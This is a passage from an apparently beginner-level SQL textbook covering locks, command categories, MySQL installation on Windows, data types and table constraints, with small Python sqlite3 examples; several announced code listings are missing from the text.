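The rollback behavior described above can be sketched in a few lines. This example uses Python's sqlite3 module as a stand-in database (the accounts table and amounts are invented); MySQL and SQL Server behave analogously:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE accounts (id INTEGER PRIMARY KEY, "
    "balance REAL CHECK (balance >= 0))"
)
conn.execute("INSERT INTO accounts VALUES (1, 100.0), (2, 50.0)")
conn.commit()

# A transfer is one logical transaction: both updates succeed, or neither does.
try:
    conn.execute("UPDATE accounts SET balance = balance + 200 WHERE id = 2")
    conn.execute("UPDATE accounts SET balance = balance - 200 WHERE id = 1")
    conn.commit()
except sqlite3.IntegrityError:
    # The second update violated the CHECK constraint, so the whole
    # transaction rolls back -- including the first, successful update.
    conn.rollback()

balances = dict(conn.execute("SELECT id, balance FROM accounts"))
print(balances)   # both balances are unchanged
conn.close()
```

This is atomicity in action: the deposit that did succeed is undone along with the failed withdrawal, leaving the database in its prior consistent state.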
There are a few variations of a database lock, and various properties of locks
as well. Lock properties include mode, granularity, and duration. The easiest
to define is duration, which specifies the time interval over which the lock is
applied. Lock modes define different types of locking, and these modes are
determined based on the type of resource being locked.

A shared lock allows data reads while the row or page lock is in effect.
Exclusive locks are for performing data manipulation (DML), and they
provide exclusive use of a row or page for the execution of data
modification. Exclusive locks do not take place concurrently, as data is being
actively modified; the page is then inaccessible to all other users regardless
of permissions. Update locks are placed on a single object and allow data
reads while the update lock is in place. They also allow the database engine
to determine if an exclusive lock is necessary once a transaction that
modifies an object is committed. This is only true if no other locks are active
on the object in question at the time of the update lock. The update lock is
the best of both worlds, allowing reads of data and DML transactions to take
place at the same time until the actual update is committed to the row or
table. These lock types describe page-level locking, but there are other types
beyond the scope of this text.

The final property of a lock, the granularity, specifies to what degree a
resource is unavailable. Rows are the smallest object available for locking,
leaving the rest of the database available for manipulation. Pages, indexes,
tables, extents, or the entire database are candidates for locking. An extent is
a physical allocation of data, and the database engine will employ this lock if
a table or index grows and more disk space is needed. Problems can arise
from locks, such as lock escalation or deadlock, and we highly encourage
readers to pursue a deeper understanding of how these function.
It is useful to mention that Oracle developed an extension for SQL that
allows for procedural instruction using SQL syntax. This is called PL/SQL.
SQL on its own is unable to provide procedural instruction because it is a
non-procedural language; the extension changes this and expands the
capabilities of SQL. PL/SQL code is used to create and modify advanced
SQL concepts such as functions, stored procedures, and triggers. Triggers
allow SQL to perform specific operations when conditional instructions are
defined. They are an advanced functionality of SQL, and often work in
conjunction with logging or alerts to notify principals or administrators when
errors occur. SQL lacks control structures for looping, branching, and
decision-making, which are available in programming languages such as
Java. The Oracle corporation developed PL/SQL to meet the needs of their
database product, which includes similar functionality to other database
management systems but is not limited to non-procedural operations.

Previously, user-defined functions were mentioned but not defined. This text
does not adequately cover the creation of user-defined functions in T-SQL,
but using programming, it is possible to create functions that fit neatly
within the same scope as system-defined functions. A user-defined
function (UDF) is a programming construct that accepts parameters, performs
tasks capable of making use of system-defined parameters, and returns
results. UDFs are tricky because Microsoft SQL allows for stored
procedures that often can accomplish the same task as a user-defined
function. Stored procedures are batches of SQL statements that can be
executed in multiple ways and contain centralized data access logic. Both of
these features are important when working with SQL in production
environments.
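The exact syntax for UDFs differs between products (T-SQL's CREATE FUNCTION, PL/SQL packages, and so on), but the core idea — a named function that accepts parameters and can then be called inside a query like a built-in function — can be sketched with sqlite3, which lets Python register a UDF directly. The function name and table here are invented for the example:

```python
import sqlite3

def tax(amount, rate):
    """A user-defined function: accepts parameters, returns a result."""
    return round(amount * rate, 2)

conn = sqlite3.connect(":memory:")
conn.create_function("tax", 2, tax)   # SQL name, argument count, callable

conn.execute("CREATE TABLE sales (id INTEGER, amount REAL)")
conn.execute("INSERT INTO sales VALUES (1, 19.99), (2, 5.00)")

# The UDF is now usable inside SQL, just like a system-defined function.
rows = conn.execute("SELECT id, tax(amount, 0.08) FROM sales").fetchall()
print(rows)
conn.close()
```

In a server product, the same logic would live in the database itself as a stored function rather than in the client program.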
Chapter 3 Some of the Basic Commands We Need
to Know

Now, before we get too far into some of the coding that we are
able to do with this kind of language, one of the first things that we need to
learn a bit more about is some of the basic commands that come with this
language, and how each of them works. You will find that when
you know some of the commands that come with any language, but
especially with the SQL language, it will ensure that everything within the
database works the way that you would like.
As we go through this, you will find that the commands in SQL, just like the
commands in any other language, are going to vary. Some are going to be
easier to work with and some are going to be more of a challenge. But all of
them are going to come into use when you would like to create some of your
own queries and more in this language as well so it is worth our time to learn
how this works.
When it comes to learning some of the basic commands that are available in
SQL, you will be able to divide them into six categories and these are all
going to be based on what you will be able to use them for within the system.
Below are the six different categories of commands that you can use inside of
SQL and they include the following.
Data Definition Language
The data definition language, or DDL, is an aspect inside of SQL that will
allow you to generate objects in the database before arranging them the way
that you would like. For example, you will be able to use this aspect of the
system in order to add or delete objects in the database table. Some of the
commands that you will be able to use with the DDL category include:

Drop table
Create table
Alter table
Create index
Alter index
Drop index
Drop view
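The DDL commands above can be seen in action with a quick sketch. This uses sqlite3 as a convenient stand-in (the table and index names are invented, and the exact ALTER TABLE options vary between database products):

```python
import sqlite3

conn = sqlite3.connect(":memory:")

# CREATE TABLE defines a new object in the database.
conn.execute("CREATE TABLE books (id INTEGER, title TEXT)")

# ALTER TABLE changes an existing object's definition.
conn.execute("ALTER TABLE books ADD COLUMN author TEXT")

# CREATE INDEX / DROP INDEX manage indexes on a table.
conn.execute("CREATE INDEX idx_title ON books (title)")
conn.execute("DROP INDEX idx_title")

# DROP TABLE removes the object entirely.
conn.execute("DROP TABLE books")

tables = conn.execute(
    "SELECT name FROM sqlite_master WHERE type = 'table'"
).fetchall()
print(tables)   # empty -- the table is gone
conn.close()
```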
Data Manipulation Language
The idea of a DML, or data manipulation language, is one of the aspects of
SQL that you will be able to use to help modify a bit of the information that
is out there about objects that are inside of your database. This is going to
make it so much easier to delete the objects, update the objects, or even to
allow for something new to be inserted inside of the database that you are
working with. You will find that this is one of the best ways to add
some freedom to the work that you are doing, and it will ensure that
you are able to change the information that is already there rather than
adding something new.
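The three DML operations — inserting, updating, and deleting — can be sketched like this (again via sqlite3; the table and values are made up for illustration):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE pets (id INTEGER, name TEXT)")

# INSERT adds new rows to the table.
conn.execute("INSERT INTO pets VALUES (1, 'Rex'), (2, 'Milo')")

# UPDATE modifies existing rows in place.
conn.execute("UPDATE pets SET name = 'Max' WHERE id = 2")

# DELETE removes rows.
conn.execute("DELETE FROM pets WHERE id = 1")

rows = conn.execute("SELECT id, name FROM pets").fetchall()
print(rows)   # only the updated second row remains
conn.close()
```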
Data Query Language
Along the same lines is the DQL, or data query language. This one is going
to be kind of fun to work with because it is one of the most powerful aspects
of the SQL language. This is going to be even truer when you
work with a modern database to help you get the work done.
When we work with this one, we will find that there is only really one
command that we are able to choose from, and this is going to be the
SELECT command. You are able to use this command to make sure that all
of your queries are run in the right way within your relational database. But if
you want to ensure that you are getting results that are more detailed, it is
possible to go through and add in some options or a special clause along with
the SELECT command to make this easier.
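For example, SELECT on its own returns rows, while clauses such as WHERE and ORDER BY narrow and arrange the result. A sketch with sqlite3 (the product data is made up):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE products (name TEXT, price REAL)")
conn.executemany(
    "INSERT INTO products VALUES (?, ?)",
    [("pen", 1.50), ("notebook", 4.00), ("stapler", 9.25)],
)

# A plain SELECT returns every row.
all_rows = conn.execute("SELECT name, price FROM products").fetchall()
print(len(all_rows))   # 3 rows

# A WHERE clause filters the result, and ORDER BY sorts it.
cheap = conn.execute(
    "SELECT name FROM products WHERE price < 5 ORDER BY price"
).fetchall()
print(cheap)   # only the items under 5, cheapest first
conn.close()
```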
Data Control Language
The DCL, or data control language, is a category of commands that you are
able to use when you would like to ensure you are maintaining some of the
control that you need over the database, and when you would like to limit
who is allowed to access that particular database, or parts of the database, at a
given time. You will also find that the DCL commands are going to be used
in a few situations to manage the objects of the database related to who is
going to have the necessary access to see the information that is found on
that database.
This could include those who will have the right to distribute the necessary
privileges of access when it comes to this data. This can be a good thing
to use if your business is dealing with a lot of sensitive information and
you only want a few people to get ahold of it at any time. Some of the
different commands that you may find useful when working with the
DCL commands are going to include:

Grant
Revoke
Create synonym
Alter password
Data Administration Commands
When you choose to work with these commands, you will be able to analyze
and also audit the operation that is in the database. In some instances, you
will be able to assess the overall performance with the help of these
commands. This is what makes these good commands to choose when you
want to fix some of the bugs that are on the system and you want to get rid of
them so that the database will continue to work properly. Some of the most
common commands that are used for this type include:
Start audit
Stop audit
One thing to keep in mind is that database administration and data
administration are basically different things when you are in SQL.
Database administration is in charge of managing all of the
databases, including the commands that you set out in SQL. It is also a
bit more specific to implementing SQL as well.

Transactional Control Commands


The final type of command that we are going to take a look at is going to be
the transactional control commands. These are going to be some good
commands that you are able to work within SQL if you would like to have
the ability to keep track of as well as manage some of the different
transactions that are going to show up in the database that you are working
with.
If you sell some products online through your website, for example, you will
need to work with the transactional control commands to help keep track of
the different options that the user is going to look for, to keep track of the
profits, and to help you manage this kind of website so that you know what
is going on with it all of the time. There are a few options that you are able
to work with when it comes to these transactional control commands, and a
few of the most important ones that we need to spend our time on include:

Commit—this one is going to save all the information that you
have about the transactions inside the database.
Savepoint—this is going to generate different points inside the
groups of transactions. You should use this along with the
Rollback command.
Rollback—this is the command that you will use if you want
to go through the database and undo one or more of the
transactions.
Set transaction—this is the command that will assign names
to the transactions in your database. You can use it to help add
in some organization to your database system.
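A quick sketch of Commit, Savepoint, and Rollback working together, using sqlite3 in manual-transaction mode (the orders table is invented for the example):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.isolation_level = None   # autocommit mode: we issue transaction commands ourselves
cur = conn.cursor()
cur.execute("CREATE TABLE orders (id INTEGER, item TEXT)")

cur.execute("BEGIN")
cur.execute("INSERT INTO orders VALUES (1, 'book')")

# SAVEPOINT marks a point we can roll back to without losing earlier work.
cur.execute("SAVEPOINT before_gift")
cur.execute("INSERT INTO orders VALUES (2, 'gift wrap')")

# ROLLBACK TO undoes only the statements made after the savepoint...
cur.execute("ROLLBACK TO before_gift")

# ...and COMMIT saves what remains of the transaction.
cur.execute("COMMIT")

rows = cur.execute("SELECT id, item FROM orders").fetchall()
print(rows)   # the first insert survived, the second did not
conn.close()
```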
All of the commands that we have spent some time discussing in this chapter
are going to be important to some of the work that we want to get done and
will ensure that we are going to find the specific results that we need out of
our database. We will be able to spend some time looking through them in
this book, but this can be a good introduction to show us what they mean, and
how we will be able to use them for some of our needs later on.
Chapter 4 Installing and configuring MySQL on
your system
If you already have the MySQL server installed on your system then you can
skip this section.
Here, I am going to provide you with the steps required to install MySQL 8.0
on a Windows computer. Here is the link to the software:
https://dev.mysql.com/downloads/mysql/8.0.html. If you are not using
Windows, then under the heading “MySQL Community Server 8.0.18” you
will see the “Select Operating System:” drop-down box. Select your operating
system and you will be provided with all the options.
If you are learning on a standalone system and you are a beginner, I would
recommend you to install Windows Essentials from https://mysql-
essential.en.uptodown.com/windows.
While looking for information on MySQL you will come across terms like
MySQL Community Server, MySQL Installer and MySQL Essentials. As the
name suggests, Essentials provides just what is essential without any
additional components and is ideal for starting to learn. Both the installer and
the community server have full server features, but the community server is
only installed online. For the installer, you have to download the package and
then install it offline.
Back to MySQL Essentials. Once you click the download button, the installer
package can be found in the downloads folder by the name of “mysql-
essential-6.0.0.msi”. Follow the steps given below for installing the software.

1. Double click on the mysql-essential-6.0.0.msi package to start
the installation process. You will see a MySQL Server 6.0 –
Setup Wizard window. To continue with the installation
process, click on the “Next” button.
2. You will now have to select the Setup Type. Setup can be one
of three types:
1. Typical for general use
2. Complete for installation of all program features
3. Custom to select which programs you want to install.
You can go ahead with the Typical installation. If you want to change the
path where the software is installed then you will have to opt for the
custom installation.

3. For this book, I went with the custom installation because I
wanted to change the path of installation. Click Next.
4. The next screen will prompt you to log in or create a MySQL
account. Signing up is not mandatory. You can create an
account or click on the “Skip Sign-Up” radio button and click
the Next button.
5. You have reached the last screen of the installation process.
Before pressing the Finish button, ensure that the “Configure
the MySQL Server now” check box is checked.
We now move on to configuration of MySQL. After clicking the “Finish”
button, you will be presented with “MySQL Server Instance Configuration
Wizard”. If the window does not pop up on its own, click the Start button on
the desktop. Look for the Wizard and click on it. Click “Next” on the first
screen. Now follow the steps given below:

1. You must first select whether you want to go for the detailed or
standard configuration. Select “Detailed Configuration”.
2. Next, you have to select the server type. Your selection will
influence memory, disk and CPU usage. Go for Server if you
are planning to work on a server that is hosting other
applications. Click Next.
3. If you have selected Server in the above step, you will be
presented with a screen where you are asked to set a path for
the InnoDB data file to enable the InnoDB database engine.
Without making any modifications, click on Next.
4. On this screen, you will have to set the approximate number of
concurrent connections directed to the server. Ideally, for
general purpose usage, it is best to go with the first option.
Click Next after making your selection.
5. On the next screen, you are presented with two options: (1) Set
the TCP/IP Networking to enabled and (2) Enable Strict Mode.
Check the “Enable TCP/IP Networking” option. The second
option “Enable Strict Mode” will be checked by default. Most
applications do not prefer this option, so if you do not have a
good reason for using it in Strict mode, uncheck this option and
click the Next button.
6. You will now be asked to set the default character set used by
MySQL. Select “Standard Character Set” and click on Next.
7. In this step, you must set the Windows options. You will see three
check boxes: “Install as Windows Service”, “Launch the
MySQL Server automatically” and “Include Bin Directory in
Windows PATH”. Check all three boxes and click Next.
8. You will now have to set the root password for the account.
Check “Modify Security Settings” and provide your password
details. If your server is on the internet then avoid checking
“Enable root access from remote machines”. Also, it is not
recommended to check the “Create An Anonymous Account”
option. Please save the password at a safe place.
9. This window will show you how the configuration is
processing. Once the processing is over, the “Finish” button
will be enabled and you can click on it.
Congratulations! You have successfully installed and configured MySQL on
your machine. It is time for action now.
Chapter 5 Data Types
There are various types of data that can be stored in databases. Listed below
are some of the data types that can be found and used in a database:
• Byte- holds numbers in the range of 0-255. Storage is 1
byte.
• Currency- this holds 15 whole dollar digits with additional decimal places
up to 4. Storage is 8 bytes.
• Date/Time- will be used for dates and times. Storage is 8 bytes.
• Double- This is a double precision floating-point which will handle most
decimals. Storage is 8 bytes.
• Integer- This allows whole numbers between -32,768 and
32,767. Storage is 2 bytes.
• Text- This is used for combinations of text and numbers. It allows up to
255 characters to be stored.
• Memo- This can be used for text of larger amounts. It can store 65,536
characters. Memo fields can’t be sorted but they can be searched.
• Long- This allows whole numbers between -2,147,483,648 and
2,147,483,647. Storage is 4 bytes.
• Single- This is a single precision floating-point that will handle most
decimals. Storage is 4 bytes.
• AutoNumber- This field can automatically give each record of data its own
number which usually starts out at 1. Storage is 4 bytes.
• Yes/No- This is a logical field that can be displayed as yes/no, true/false, or
on/off. The use of true and false should be equivalent to -1 and 0. In these
fields, null values are not allowed. Storage is 1 bit.
• Ole Object- This can store BLOBs (Binary Large Objects) such as pictures,
audio, and video. The storage is up to 1 gigabyte (GB).
• Hyperlink- This contains links to other files like web pages.
• Lookup Wizard- This lets you make a list of options, which can then be
chosen from a drop-down list. Storage is 4 bytes.
Overall, data types can be categorized into three different types of data. They
are either
1. Character types
2. Number types
3. Date/Time types
Character types consist of text. Number types contain amounts or numbers.
Date/Time types consist of a recorded date or time. Listed below are some of
the types of data of each category.
Character Data Types
• CHAR(size)- A fixed length string can be held with this data type. It is able
to hold special characters, letters and numbers. This can store up to 255
characters.
• VARCHAR(size)- This can hold a variable-length string which is able to
hold special characters, letters and numbers. The size is specified in
parentheses. It can store up to 255 characters. If a size higher than 255
characters is specified, it is automatically converted to a TEXT type.
• TINYTEXT- This holds a string with 255 characters of maximum length.
• TEXT- This holds a string with 65,535 characters of maximum length.
• MEDIUMTEXT- This holds a string with a maximum of 16,777,215
characters.
• LONGTEXT- This holds a string with a maximum of 4,294,967,295
characters.
• BLOB- These hold 65,535 bytes of maximum data.
• MEDIUMBLOB- These hold 16,777,215 bytes of maximum data.
• LONGBLOB- These hold 4,294,967,295 bytes of maximum data.
• ENUM(x,y,z, etc.)- A list that contains possible values. This list can
hold a maximum of 65,535 values. When a value is entered that isn’t
contained inside that list, a blank value will be entered instead. The values
will also be sorted in the order in which they are entered.
• SET- This is similar to the ENUM data type. This data type holds a
maximum of 64 list items and is able to store more than one choice.
Number Data Types
The most common of the options are listed below along with their storage
type when it comes to bytes and values:
• TINYINT(size)- Holds -128 to 127, or 0 to 255 unsigned.
• SMALLINT(size)- Holds -32768 to 32767, or 0 to 65535 unsigned.
• MEDIUMINT(size)- Holds -8,388,608 to 8,388,607, or 0 to 16,777,215
unsigned.
• INT(size)- Holds -2,147,483,648 to 2,147,483,647, or 0 to 4,294,967,295
unsigned.
• BIGINT(size)- Holds -9,223,372,036,854,775,808 to
9,223,372,036,854,775,807, or 0 to
18,446,744,073,709,551,615 unsigned.
• FLOAT(size,d)- This is a small number with a decimal point that can float.
The maximum number of digits is specified in the size parameter. The
maximum number of digits to the right of the decimal point is specified in
the d parameter.
• DOUBLE(size,d)- This is a large number with a decimal point that
floats. The maximum number of digits may be specified in the size parameter
(size). The maximum number of digits to the right of the decimal point is
specified in the d parameter (d).
• DECIMAL(size,d)- This is stored as a string and allows for a fixed decimal
point. The maximum number of digits may be specified in the
size parameter (size). The maximum number of digits to the right of the
decimal point is specified in the d parameter (d).
An extra option found in integer types is called unsigned. Normally, an
integer will range from a negative value to a positive one. Adding the
unsigned attribute moves the range up so that it starts at zero instead of a
negative number. That is why the unsigned option is
mentioned after the specified numbers listed for the different data types.
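The shift is just arithmetic: an n-byte integer has 2^(8n) possible values, and signed types split them around zero while unsigned types start at zero. A quick check of the ranges listed above:

```python
# Each byte stores 8 bits, giving 2**(8*n) possible values for n bytes.
def signed_range(n_bytes):
    total = 2 ** (8 * n_bytes)
    return -total // 2, total // 2 - 1

def unsigned_range(n_bytes):
    return 0, 2 ** (8 * n_bytes) - 1

print(signed_range(1))    # TINYINT:          (-128, 127)
print(unsigned_range(1))  # TINYINT UNSIGNED: (0, 255)
print(signed_range(4))    # INT:              (-2147483648, 2147483647)
print(unsigned_range(4))  # INT UNSIGNED:     (0, 4294967295)
```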
Date/Time Data Types
The options for date are:
• DATE()- This is used to enter a date in the format of YYYY-MM-DD, as
in 2016-04-19 (April 19th, 2016).
• DATETIME()- This is used to enter a combination of date and time in
the format of YYYY-MM-DD HH:MM:SS, with the time portion written as in
13:30:26 (1:30 p.m. at 26 seconds).
• TIMESTAMP()- This is used to store a timestamp, matched to the current
time zone. The format is YYYY-MM-DD HH:MM:SS.
• TIME()- This will allow you to enter the time. The format is HH:MM:SS.
• YEAR()- This is used to enter a year in a two or four digit format. A
four-digit format would be 2016 or 1992. A two-digit format would be
72 or 13.
It is important to note that DATETIME and TIMESTAMP return values in
the same format. When compared to each other, they still work in different
ways. TIMESTAMP will automatically update to the current time and date
of the present time zone. TIMESTAMP will also accept various other
formats, such as YYYYMMDDHHMMSS, YYMMDDHHMMSS,
YYYYMMDD, and YYMMDD.
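A quick way to see these formats concretely is Python's strftime, which can produce the literal strings that the DATE, DATETIME, and TIME types expect (the example date is arbitrary):

```python
from datetime import datetime

moment = datetime(2016, 4, 19, 13, 30, 26)

print(moment.strftime("%Y-%m-%d"))            # DATE:     2016-04-19
print(moment.strftime("%Y-%m-%d %H:%M:%S"))   # DATETIME: 2016-04-19 13:30:26
print(moment.strftime("%H:%M:%S"))            # TIME:     13:30:26
print(moment.strftime("%Y"))                  # YEAR (four-digit): 2016
print(moment.strftime("%Y%m%d%H%M%S"))        # one TIMESTAMP input form
```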
Chapter 6 SQL Constraints
Constraints refer to the rules or restrictions that are applied to a table or
its columns. These rules are applied to ensure that only valid data
can be entered into a table. The use of constraints helps ensure the accuracy
and reliability of data.
You can specify constraints on a table or column level. When constraints are
specified on a column level, they are only applicable to a specific column.
When they are defined on a table basis, they are implemented on the entire
table.
SQL offers several types of constraints. Following are the most commonly
used ones:
PRIMARY Key
FOREIGN Key
UNIQUE Key
INDEX
NOT NULL
CHECK Constraint
DEFAULT Constraint
PRIMARY Key
A primary key is a unique value used to identify a row or record. There is
only one primary key per table, but it may consist of multiple fields. A
column that has been designated as a primary key can't contain NULL
values. In general, a primary key is designated during the table creation
stage.
Creating a Primary Key
The following statement creates a table named Employees and designates the
ID field as its primary key:
You may also specify a primary key constraint later using the ALTER
TABLE statement. Here’s the code for adding a primary constraint to the
EMPLOYEES table:

Deleting Primary Key Constraint


To remove the primary key constraint from a table, you will use the ALTER
TABLE with the DROP statement. You may use this statement:
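Whichever syntax you use to declare it, the effect of a primary key is the same: duplicate key values are rejected. Here is a minimal sketch using SQLite through Python's sqlite3 module (the table and column names are assumed for illustration; note that SQLite, unlike SQL Server's ALTER TABLE, only accepts a primary key at table-creation time):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
cur = conn.cursor()

# Designate ID as the primary key when the table is created.
cur.execute("""
    CREATE TABLE EMPLOYEES (
        ID INT NOT NULL,
        NAME VARCHAR(20) NOT NULL,
        PRIMARY KEY (ID)
    )
""")
cur.execute("INSERT INTO EMPLOYEES VALUES (1, 'John')")

# A second row with the same ID violates the primary key constraint.
try:
    cur.execute("INSERT INTO EMPLOYEES VALUES (1, 'Mike')")
    duplicate_rejected = False
except sqlite3.IntegrityError:
    duplicate_rejected = True
```

The second INSERT raises an integrity error, leaving only the original row in the table.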

FOREIGN Key
A foreign key constraint is used to associate a table with another table. Also
known as referencing key, the foreign key is commonly used when you’re
working on parent and child tables. In this type of table relationship, a key in
the child table points to a primary key in the parent table.
A foreign key may consist of one or several columns containing values that
match the primary key in another table. It is commonly used to ensure
referential integrity within the database.

The diagram below will demonstrate the parent-child table relationship:

The EMPLOYEES_TBL is the parent table. It contains important information
about employees and uses the field emp_id as its primary key to identify each
employee. The EMPLOYEES_SALARY_TBL contains information about
employees' salary, position, and other details.
It is logical to assume that all salary data are associated with a specific
employee entered in the EMPLOYEES_TBL. You can enforce this logic by
adding a foreign key on the EMPLOYEES_SALARY_TBL and setting it to
point to the primary key of the EMPLOYEES_TBL. This ensures that the
data for each employee in the EMPLOYEES_SALARY_TBL are referenced
to a specific employee listed in the EMPLOYEES_TBL. Consequently, it
also prevents the EMPLOYEES_SALARY_TBL from storing data for
employees that are not included in the EMPLOYEES_TBL.
To demonstrate how to set up the foreign key constraint, create a table named
EMPLOYEE with the following statement:

The EMPLOYEE table will serve as the parent table.


Next, create a child table that will refer to the EMPLOYEE table:

Notice that the ID column in the EMPLOYEE_SALARY table references the
ID column in the EMPLOYEE table.
At this point, you may want to see the structure of the EMPLOYEE_SALARY
table. You can use the DESC command to do this:
DESC EMPLOYEE_SALARY;
The FOREIGN KEY constraint is typically specified during table creation but
you can still add a foreign key to existing tables by modifying the table. For
this purpose, you will use the ALTER TABLE command.
For example, to add a foreign key constraint to the EMPLOYEE_SALARY
table, you will use this statement:
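The behavior the foreign key enforces can be sketched with SQLite through Python's sqlite3 (table names assumed for illustration; SQLite needs PRAGMA foreign_keys = ON before it will enforce them):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
cur = conn.cursor()
cur.execute("PRAGMA foreign_keys = ON")  # SQLite enforces FKs only when asked

cur.execute("CREATE TABLE EMPLOYEE (ID INT PRIMARY KEY, NAME TEXT)")
cur.execute("""
    CREATE TABLE EMPLOYEE_SALARY (
        RECORD_ID INT PRIMARY KEY,
        ID INT,
        SALARY REAL,
        FOREIGN KEY (ID) REFERENCES EMPLOYEE (ID)
    )
""")
cur.execute("INSERT INTO EMPLOYEE VALUES (1, 'John')")
cur.execute("INSERT INTO EMPLOYEE_SALARY VALUES (100, 1, 5000.0)")  # parent exists

# Salary data for an employee missing from the parent table is rejected.
try:
    cur.execute("INSERT INTO EMPLOYEE_SALARY VALUES (101, 99, 4000.0)")
    orphan_rejected = False
except sqlite3.IntegrityError:
    orphan_rejected = True
```

This is exactly the referential integrity described above: the child table cannot hold rows that point at a nonexistent parent.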

Removing FOREIGN KEY constraint


To drop a FOREIGN KEY constraint, you will use this simple syntax:

NOT NULL
A column accepts NULL values by default. To prevent NULL values from
populating a table's column, you can apply a NOT NULL constraint on the
column. Bear in mind that NULL denotes unknown or missing data, not
zero.
To illustrate, the following code creates the table STUDENTS and defines six
columns:

Notice the NOT NULL modifier on the columns ID, LAST_NAME,
FIRST_NAME, and AGE. This means that these columns will not accept
NULL values.
If you want to modify a column that takes a NULL value to one that does not
accept NULL values, you can do so with the ALTER TABLE statement. For
instance, if you want to enforce a NOT NULL constraint on the column
LOCATION, here’s the code:
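Whatever syntax your server uses to apply it, the constraint's effect can be sketched with SQLite via Python's sqlite3 (column list mirrors the STUDENTS table above; note SQLite cannot add NOT NULL to an existing column the way SQL Server's ALTER TABLE can, so the constraint is declared at creation time here):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
cur = conn.cursor()
cur.execute("""
    CREATE TABLE STUDENTS (
        ID INT NOT NULL,
        LAST_NAME TEXT NOT NULL,
        FIRST_NAME TEXT NOT NULL,
        AGE INT NOT NULL,
        ADDRESS TEXT,
        LOCATION TEXT
    )
""")

# Omitting a NOT NULL column (LAST_NAME is left NULL here) is rejected.
try:
    cur.execute("INSERT INTO STUDENTS (ID, FIRST_NAME, AGE) VALUES (1, 'Ana', 20)")
    null_rejected = False
except sqlite3.IntegrityError:
    null_rejected = True
```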
UNIQUE Key
A UNIQUE key constraint is used to ensure that all column values are
unique. Enforcing this constraint prevents two or more rows from holding the
same values in a particular column. For example, you can apply this
constraint if you don’t want two or more students to have the same
LAST_NAME in the STUDENTS table. Here’s the code:

You can also use the ALTER TABLE statement to add a UNIQUE constraint
to an existing table. Here’s the code:

You may also add constraint to more than one column by using ALTER
TABLE with ADD CONSTRAINT:

Removing a UNIQUE constraint


To remove the myUniqueConstraint, you will use the ALTER TABLE with
the DROP statement. Here’s the syntax:
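Before moving on, the behavior a UNIQUE constraint enforces can be sketched with SQLite via Python's sqlite3 (names assumed for illustration):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
cur = conn.cursor()
cur.execute("""
    CREATE TABLE STUDENTS (
        ID INT PRIMARY KEY,
        LAST_NAME TEXT UNIQUE
    )
""")
cur.execute("INSERT INTO STUDENTS VALUES (1, 'Smith')")

# A second row with the same LAST_NAME violates the UNIQUE constraint.
try:
    cur.execute("INSERT INTO STUDENTS VALUES (2, 'Smith')")
    unique_enforced = False
except sqlite3.IntegrityError:
    unique_enforced = True
```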

DEFAULT Constraint
The DEFAULT constraint is used to provide a default value whenever the
user fails to enter a value for a column during an INSERT INTO operation.
To demonstrate, the following code will create a table named EMPLOYEES
with five columns. Notice that the SALARY column takes a default value
(4000.00) which will be used if no value was provided when you add new
records:

You may also use the ALTER STATEMENT to add a DEFAULT constraint
to an existing table:

Removing a Default Constraint


To remove a DEFAULT constraint, you will use the ALTER TABLE with
the DROP statement:
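The default-value behavior itself can be sketched with SQLite via Python's sqlite3 (column names assumed; the 4000.00 default matches the example above):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
cur = conn.cursor()
cur.execute("""
    CREATE TABLE EMPLOYEES (
        ID INT PRIMARY KEY,
        NAME TEXT,
        SALARY REAL DEFAULT 4000.00
    )
""")
# No SALARY is supplied, so the default value kicks in.
cur.execute("INSERT INTO EMPLOYEES (ID, NAME) VALUES (1, 'John')")
default_salary = cur.execute(
    "SELECT SALARY FROM EMPLOYEES WHERE ID = 1").fetchone()[0]
```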

CHECK Constraint
A CHECK constraint is used to ensure that every value entered in a column
satisfies a given condition. An attempt to enter non-matching data violates
the CHECK constraint and causes the data to be rejected.
For example, the code below will create a table named GAMERS with five
columns. It will place a CHECK constraint on the AGE column to ensure that
there will be no gamers under 13 years old on the table.

You can also use the ALTER TABLE statement with MODIFY to add the
CHECK constraint to an existing table:
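The GAMERS example can be sketched with SQLite via Python's sqlite3 (names assumed; the age rule matches the one described above):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
cur = conn.cursor()
cur.execute("""
    CREATE TABLE GAMERS (
        ID INT PRIMARY KEY,
        NAME TEXT,
        AGE INT CHECK (AGE >= 13)
    )
""")
cur.execute("INSERT INTO GAMERS VALUES (1, 'Lee', 15)")  # passes the check

# A gamer under 13 violates the CHECK constraint.
try:
    cur.execute("INSERT INTO GAMERS VALUES (2, 'Kim', 12)")
    underage_rejected = False
except sqlite3.IntegrityError:
    underage_rejected = True
```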
INDEX Constraint
The INDEX constraint lets you build and access information quickly from a
database. You can easily create an index on one or more table columns.
After the INDEX is created, SQL assigns a ROWID to each row prior to
sorting. Proper indexing can enhance the performance and efficiency of large
databases.
Here’s the syntax:

For instance, if you need to search for a group of employees from a specific
location in the EMPLOYEES table, you can create an INDEX on the column
LOCATION.
Here’s the code:

Removing the INDEX Constraint


To remove the INDEX constraint, you will use the ALTER TABLE
statement with DROP.
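You can observe an index being used with SQLite via Python's sqlite3 (names assumed; EXPLAIN QUERY PLAN is SQLite's way of showing the query plan, analogous to SQL Server's execution plans):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
cur = conn.cursor()
cur.execute("CREATE TABLE EMPLOYEES (ID INT PRIMARY KEY, NAME TEXT, LOCATION TEXT)")
cur.execute("CREATE INDEX idx_location ON EMPLOYEES (LOCATION)")

# The planner reports that lookups on LOCATION now use the index.
plan = cur.execute(
    "EXPLAIN QUERY PLAN SELECT * FROM EMPLOYEES WHERE LOCATION = 'Chicago'"
).fetchall()
uses_index = any("idx_location" in str(row) for row in plan)
```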
Chapter 7 Databases
In this chapter, I will talk about different database-related operations. You
need to learn these operations as part of learning SQL. The operations that I
am talking about here are how to create a database, how to select a database,
and finally, if need be, how to drop a database from your SQL Server. I will
teach you how to do these operations with queries and with the help of the
graphical user interface of SQL Server.
So, let's start with creating a database. Start SQL Server and connect to the
SQL instance that you created while setting up SQL Server. Click on the
New Query option available on the "Standard" toolbar under the main menu.
After you click the New Query button, a window will open up, and you will
see a text editor on your screen. In the text editor, write the following query:
